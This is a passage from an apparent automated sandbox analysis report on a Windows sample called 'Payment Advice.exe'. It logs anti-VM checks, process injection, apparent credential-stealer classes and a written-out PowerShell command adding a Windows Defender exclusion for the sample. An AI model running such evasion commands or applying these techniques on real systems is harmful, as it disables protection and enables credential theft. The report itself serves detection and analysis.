                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: Payment Advice.exe PID: 2708, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 1100000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 2D90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 4D90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 9100000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: A100000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: A310000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: B310000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 1870000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 3400000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: 3220000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5271Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4524Jump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exe TID: 6312Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5296Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: Payment Advice.exe, 00000000.00000002.1761916348.00000000011B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\H
                  Source: Payment Advice.exe, 00000005.00000002.2995203152.000000000162F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 5_2_0187C168 LdrInitializeThunk,LdrInitializeThunk,5_2_0187C168
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\Payment Advice.exeMemory written: C:\Users\user\Desktop\Payment Advice.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeProcess created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Users\user\Desktop\Payment Advice.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
